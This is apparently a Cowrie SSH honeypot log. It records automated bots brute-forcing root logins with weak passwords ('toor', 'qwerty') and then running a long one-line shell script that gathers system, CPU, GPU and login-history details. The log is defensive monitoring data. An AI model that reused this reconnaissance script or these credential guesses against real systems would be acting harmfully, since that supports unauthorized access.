{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-09-08T19:12:50.896963Z","src_ip":"212.227.235.229","session":"f600b173c2d1"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-09-08T19:12:50.898147Z","src_ip":"212.227.235.229","session":"f600b173c2d1"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-09-08T19:12:50.899085Z","src_ip":"212.227.235.229","session":"f600b173c2d1"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-09-08T19:12:50.899639Z","src_ip":"212.227.235.229","session":"f600b173c2d1"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-09-08T19:12:50.900627Z","src_ip":"212.227.235.229","session":"f600b173c2d1"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-09-08T19:12:50.901083Z","src_ip":"212.227.235.229","session":"f600b173c2d1"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-09-08T19:12:50.901493Z","src_ip":"212.227.235.229","session":"f600b173c2d1"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-09-08T19:12:50.901998Z","src_ip":"212.227.235.229","session":"f600b173c2d1"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-09-08T19:12:50.902744Z","src_ip":"212.227.235.229","session":"f600b173c2d1"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-09-08T19:12:50.903097Z","src_ip":"212.227.235.229","session":"f600b173c2d1"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T19:12:50.904295Z","src_ip":"212.227.125.160","session":"2f302ad7b55a"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T19:12:51.160825Z","src_ip":"212.227.125.160","session":"2f302ad7b55a"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-09-08T19:12:51.190431Z","src_ip":"212.227.235.229","session":"f600b173c2d1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287","size":74,"shasum":"d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:12:51.191306Z","src_ip":"212.227.235.229","session":"f600b173c2d1"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:12:51.192358Z","src_ip":"212.227.235.229","session":"f600b173c2d1"}
{"eventid":"cowrie.login.success","username":"root","password":"toor","message":"login attempt [root/toor] succeeded","sensor":"my-vps","timestamp":"2025-09-08T19:12:53.183056Z","src_ip":"212.227.125.160","session":"2f302ad7b55a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T19:12:54.257781Z","src_ip":"212.227.125.160","session":"2f302ad7b55a"}
{"eventid":"cowrie.command.input","input":"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s, \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null); [ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime 2>/dev/null | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; }; cpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E \"model name|Hardware\" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,\"\",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"CAT_HELP:$cat_help\"; echo \"LS_HELP:$ls_help\"; echo \"LAST:$last_output\"","message":"CMD: export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s, \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null); [ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime 2>/dev/null | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; }; cpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E \"model name|Hardware\" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,\"\",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"CAT_HELP:$cat_help\"; echo \"LS_HELP:$ls_help\"; echo \"LAST:$last_output\"","sensor":"my-vps","timestamp":"2025-09-08T19:12:54.258511Z","src_ip":"212.227.125.160","session":"2f302ad7b55a"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-09-08T19:12:54.259247Z","src_ip":"212.227.125.160","session":"2f302ad7b55a"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-09-08T19:12:54.260958Z","src_ip":"212.227.125.160","session":"2f302ad7b55a"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-09-08T19:12:54.262532Z","src_ip":"212.227.125.160","session":"2f302ad7b55a"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-09-08T19:12:54.263269Z","src_ip":"212.227.125.160","session":"2f302ad7b55a"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-09-08T19:12:54.264043Z","src_ip":"212.227.125.160","session":"2f302ad7b55a"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-09-08T19:12:54.265238Z","src_ip":"212.227.125.160","session":"2f302ad7b55a"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-09-08T19:12:54.265950Z","src_ip":"212.227.125.160","session":"2f302ad7b55a"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-09-08T19:12:54.266893Z","src_ip":"212.227.125.160","session":"2f302ad7b55a"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-09-08T19:12:54.267903Z","src_ip":"212.227.125.160","session":"2f302ad7b55a"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-09-08T19:12:54.268889Z","src_ip":"212.227.125.160","session":"2f302ad7b55a"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-09-08T19:12:54.269311Z","src_ip":"212.227.125.160","session":"2f302ad7b55a"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-09-08T19:12:54.648358Z","src_ip":"212.227.125.160","session":"2f302ad7b55a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287","size":74,"shasum":"d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287 after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:12:54.649289Z","src_ip":"212.227.125.160","session":"2f302ad7b55a"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:12:54.650189Z","src_ip":"212.227.125.160","session":"2f302ad7b55a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36158,"dst_ip":"1.2.3.4","dst_port":22,"session":"2f6eb90f5d87","protocol":"ssh","message":"New connection: 212.227.235.229:36158 (1.2.3.4:22) [session: 2f6eb90f5d87]","sensor":"my-vps","timestamp":"2025-09-08T19:14:19.222817Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T19:14:19.231596Z","src_ip":"212.227.235.229","session":"2f6eb90f5d87"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T19:14:19.530807Z","src_ip":"212.227.235.229","session":"2f6eb90f5d87"}
{"eventid":"cowrie.login.success","username":"root","password":"qwerty","message":"login attempt [root/qwerty] succeeded","sensor":"my-vps","timestamp":"2025-09-08T19:14:20.785134Z","src_ip":"212.227.235.229","session":"2f6eb90f5d87"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52662,"dst_ip":"1.2.3.4","dst_port":22,"session":"f4a5339d09d7","protocol":"ssh","message":"New connection: 212.227.125.160:52662 (1.2.3.4:22) [session: f4a5339d09d7]","sensor":"my-vps","timestamp":"2025-09-08T19:14:20.922282Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T19:14:20.923182Z","src_ip":"212.227.125.160","session":"f4a5339d09d7"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T19:14:21.380598Z","src_ip":"212.227.125.160","session":"f4a5339d09d7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T19:14:21.472095Z","src_ip":"212.227.235.229","session":"2f6eb90f5d87"}
{"eventid":"cowrie.command.input","input":"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s, \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null); [ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime 2>/dev/null | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; }; cpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E \"model name|Hardware\" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,\"\",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"CAT_HELP:$cat_help\"; echo \"LS_HELP:$ls_help\"; echo \"LAST:$last_output\"","message":"CMD: export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s, \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null); [ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime 2>/dev/null | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; }; cpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E \"model name|Hardware\" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,\"\",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"CAT_HELP:$cat_help\"; echo \"LS_HELP:$ls_help\"; echo \"LAST:$last_output\"","sensor":"my-vps","timestamp":"2025-09-08T19:14:21.472913Z","src_ip":"212.227.235.229","session":"2f6eb90f5d87"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-09-08T19:14:21.473673Z","src_ip":"212.227.235.229","session":"2f6eb90f5d87"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-09-08T19:14:21.474782Z","src_ip":"212.227.235.229","session":"2f6eb90f5d87"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-09-08T19:14:21.476386Z","src_ip":"212.227.235.229","session":"2f6eb90f5d87"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-09-08T19:14:21.477228Z","src_ip":"212.227.235.229","session":"2f6eb90f5d87"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-09-08T19:14:21.478005Z","src_ip":"212.227.235.229","session":"2f6eb90f5d87"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-09-08T19:14:21.479621Z","src_ip":"212.227.235.229","session":"2f6eb90f5d87"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-09-08T19:14:21.480371Z","src_ip":"212.227.235.229","session":"2f6eb90f5d87"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-09-08T19:14:21.481091Z","src_ip":"212.227.235.229","session":"2f6eb90f5d87"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-09-08T19:14:21.481723Z","src_ip":"212.227.235.229","session":"2f6eb90f5d87"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-09-08T19:14:21.482575Z","src_ip":"212.227.235.229","session":"2f6eb90f5d87"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-09-08T19:14:21.483216Z","src_ip":"212.227.235.229","session":"2f6eb90f5d87"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-09-08T19:14:21.787695Z","src_ip":"212.227.235.229","session":"2f6eb90f5d87"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287","size":74,"shasum":"d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:14:21.788644Z","src_ip":"212.227.235.229","session":"2f6eb90f5d87"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:14:21.789547Z","src_ip":"212.227.235.229","session":"2f6eb90f5d87"}
{"eventid":"cowrie.login.success","username":"root","password":"qwerty","message":"login attempt [root/qwerty] succeeded","sensor":"my-vps","timestamp":"2025-09-08T19:14:22.772286Z","src_ip":"212.227.125.160","session":"f4a5339d09d7"}
